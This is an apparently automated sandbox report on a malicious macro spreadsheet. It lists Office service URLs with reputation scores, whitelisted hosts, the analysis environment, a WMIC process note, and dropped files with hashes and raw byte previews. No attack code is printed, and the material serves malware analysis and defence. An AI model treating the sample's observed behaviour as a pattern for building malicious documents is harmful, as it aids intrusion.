                                                                                          https://insertmedia.bing.office.net/odc/insertmedia57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                high
                                                                                                https://api.office.net57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorize57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://augloop.office.com/v257FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://skyapi.live.net/Activity/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://clients.config.office.net/user/v1.0/mac57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://dataservice.o365filtering.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://api.cortana.ai57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://onedrive.live.com57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://ovisualuiapp.azurewebsites.net/pbiagave/57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://visio.uservoice.com/forums/368202-visio-on-devices57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://directory.services.57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://login.windows-ppe.net/common/oauth2/authorize57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://staging.cortana.ai57FBA9A8-2000-47F8-A377-79E0C5F32956.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  No contacted IP infos

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:382991
                                                                                                                                                  Start date:07.04.2021
                                                                                                                                                  Start time:02:14:15
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 4m 31s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Documents (252).xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:32
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal96.troj.expl.evad.winXLSM@5/14@1/0
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.193.48, 52.109.76.68, 52.109.76.33, 52.147.198.201, 52.109.76.35, 13.88.21.125, 104.43.139.144, 20.50.102.62, 23.10.249.43, 23.10.249.26, 23.54.113.104, 20.54.26.129, 23.54.113.53
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  02:15:10API Interceptor1x Sleep call for process: WMIC.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  No context

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  No context

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\57FBA9A8-2000-47F8-A377-79E0C5F32956
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133170
                                                                                                                                                  Entropy (8bit):5.371008837049652
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:ZcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:5VQ9DQW+zTXiJ
                                                                                                                                                  MD5:5DB1A55B07BB8D56FD0EB788248F4D96
                                                                                                                                                  SHA1:C2FA81884E6C84D3BDE2D6EC30C034621AD62280
                                                                                                                                                  SHA-256:14D3E8A56B4E76CACE007D18A6BC9159F6385915D7052A14181AD400D7BF95ED
                                                                                                                                                  SHA-512:C408789701671C045A72AA3D3C44B7D13A75F5AA3D1F446F21909CEAD76F6F9C19DCAD47D2FCF2D76ADCFE9E8465009C30CC03F7EBAC214AD43068941B0573B4
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-07T00:15:07">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16FAB1FD.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1028
                                                                                                                                                  Entropy (8bit):7.761039651897249
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                  MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                  SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                  SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                  SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\24A76642.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):677
                                                                                                                                                  Entropy (8bit):7.433026174405032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                  MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                  SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                  SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                  SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6F5AD7DA.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15644
                                                                                                                                                  Entropy (8bit):7.974497191204788
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
                                                                                                                                                  MD5:29A9EE6FB5591751FC60ECD0FDB9478D
                                                                                                                                                  SHA1:D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
                                                                                                                                                  SHA-256:F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
                                                                                                                                                  SHA-512:5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..|\.'..K.c..IJJ...`.......4o...]G*V.$/...<..S.<.<RD..s...../^B...._.*U.J.F..{..2|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.*^....[."..2..\.....)[.....v.zJ.|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6|f}4......+*[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8BB07D5B.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1028
                                                                                                                                                  Entropy (8bit):7.761039651897249
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA
                                                                                                                                                  MD5:600F503BC1066BEB5FB5DD494AA1CD74
                                                                                                                                                  SHA1:A504D5E687B98F9E0FD2896DFC8492DE0F974BE6
                                                                                                                                                  SHA-256:B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3
                                                                                                                                                  SHA-512:B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x....IDATHK..YL.Q......Vl.P. .qC.(....(.".-..q....%1.q./F.Q.L\./4.KlX.Q...EE..(. ..V.i;.z...h..7.0........(...|s.k.J.Mm].J|.3........W.&EE..s.hS.}.....%^x`s....s..Rb..9....jw...o.e..17=:!&..X.Q._.!. |....N$.L.1.N..}.k..v..2.piZ..A.,.l.w......I.{...p...C[......'.........b....:f.\?!3MK........Cb..B.....%`?1..Y>9\....P.......z..uK...g.V.P.U.3...L.j.?(.g.....}.=.}......L.B.{...i.!..-q....9(=%^......&.q.j..>.q...w.NO.@.D..jmnL...U.R0B=6...U....P}Koh.D@"...]9...r,. .."2.......[.~ .......... .ay....nCm'...(..$......_4....*gNT..02h...zT.b.hhF..E.l.Z..J8.....=..H.{....Q...hg.g...u_!...T7./..+...u.....m...C]..E-..ki.CS..2.V..v>.?..$d..U.o.o...w........."....7..g...O]...U`..........g..A.j.....b...\.s(I.......@._B....i..2.I..7W.6....`..!r].P.......^.8n ..X...+3...F.....!x...H..fkYu....y.l...(../.y....,;~qV.R!#C.q...yoE..{O:...R.......c...Z;..[.x.....#N...'....M..@...n0..nD..!..p.!J....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A09996EC.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):677
                                                                                                                                                  Entropy (8bit):7.433026174405032
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6
                                                                                                                                                  MD5:55E8A29B221E51BE421B7D4F5F5F7E52
                                                                                                                                                  SHA1:117E73181FC9CDAA0904C6372D68EE48CEDC14E4
                                                                                                                                                  SHA-256:B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8
                                                                                                                                                  SHA-512:8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR..............R9.....sRGB.........pHYs...t...t..f.x...JIDATHKc...?...g..l.;k...FF...@H..jb`d..?-P'.SYA......f.........'.?............{K.a..:..W..s.~.....{.....<.....9.......[.=\{.._FN^._{'{3VM?.p..v._....v..;..s...O.....*.|........yaz....!/...........o..xZ.Sn...O+YP.122.....33.A..3.?.DR...+.F...o.M_..h.W...}..K?.........*....z..K...........F?..{............|..`!l*X...E.....$.......3... ..0....+.r.D.D7e.&.b...t...../..o.I2.p...yl.J|.Y0j4Z....!.s#;.XW.gbd`.bb........X..ue...'fi..[1..!.@.......s.:(..e`}.. ...-...1.. J..(`..,}.X...H.>".m?..h .X.D.5Ff......y"4.P.4d...@.A..8.[?..7q....I.*.M..[.>\{....j..Y3...3.5'......op.....IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A7CB9FA0.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 287 x 78, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):15644
                                                                                                                                                  Entropy (8bit):7.974497191204788
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf
                                                                                                                                                  MD5:29A9EE6FB5591751FC60ECD0FDB9478D
                                                                                                                                                  SHA1:D8A58D27A5D77416E1B882FDE001FE827EB0C1F5
                                                                                                                                                  SHA-256:F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F
                                                                                                                                                  SHA-512:5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......N.............sRGB.........gAMA......a.....pHYs..........&.?..<.IDATx^.wxTU...........M..+....G..J.^.P.T...6:.$$....H..J.......u.a2LB(F.g]n.....Y..W...+..r..U.o.$'/...o./.E..R.r.y..D.G.P..R.@A.....b...O?..n....0Pbc.d..)Gu.^..|\.'..K.c..IJJ...`.......4o...]G*V.$/...<..S.<.<RD..s...../^B...._.*U.J.F..{..2|.p..S.N....[\.q.o.......e.....$.}..4k.L^...y.R./_~.=....H.......\c;.. .a.9sI..9..2e^.V.ZK@@.......2.W..q..L.?..CN.>-.7o...H...o....B.)R......^.......<A.{;...k..o....7..\M..+.....J...ge.U2v.X...T.PA.z...-ZL...&O...ooP.~...-l.c3..}..7.m.....w..>...r..IY.h....o..{m.*^....[."..2..\.....)[.....v.zJ.|LJ.zB.x.)3.T..g3...K..T......c.c...k2j.(...7..>..e.b/_.BF.....i....y...6|f}4......+*[..T.\Y..+-[..n..o...o..VM./..+={~,.;v..M.J...b...K.5.......x,.q.f..e...+)3v%3...W....k...N.........:.-3.l.}...D.*T.(W...o..&S.D....d....g..9r..?~\N.8............r.J.5k.9w...4X......=..sz.{~@...&.c.Rf.Jf..>..U..bbb.>2....9......
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\86810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):277688
                                                                                                                                                  Entropy (8bit):7.553565332828095
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:2OOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijf:2ZllSdosux9RbXwGXJtttYlBJDy2sC
                                                                                                                                                  MD5:7F8E2F250B102531058343060B1A85D4
                                                                                                                                                  SHA1:DD7A964CB4296F66F817D8ADDD7C98A8CE82E786
                                                                                                                                                  SHA-256:E9B1B7DE87303FBBFE2CB786FED20B2A5412BE614FAA6BC346AB4F2473E13818
                                                                                                                                                  SHA-512:B2F2350D2358BAF844012C8E8B77F0C9D1554D720BB3CBC6323902F1394ADDE760850F803D72C5DFC26FE9FC3E8B26CF14B65CF5FAE56FA4F0FA43E36FFC8689
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Wed Apr 7 08:15:09 2021, atime=Wed Apr 7 08:15:09 2021, length=12288, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.664611778571911
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8uXUU+uElPCH2AlA/Ydfge+WrjAZ/2bD8q5LC5Lu4t2Y+xIBjKZm:889lA8AZiD8l87aB6m
                                                                                                                                                  MD5:6CE3AFC945BE909FF190D896DD565667
                                                                                                                                                  SHA1:DF73D53BE84ABFF95A80CD9D182CF41449C910BE
                                                                                                                                                  SHA-256:DA6A220EF782C366DA90F0ED03AB3AB55A895E2B14F1442F9278E9081E886111
                                                                                                                                                  SHA-512:42BA2B4B89AECC3B0709E4087489354CA41CBCDE70CA41D0048814FCD206EDC84DCED7E42D1FC4AFD9588FD5C29CF79DF46EC9E9C018D8D1D0F5C65F80257C5E
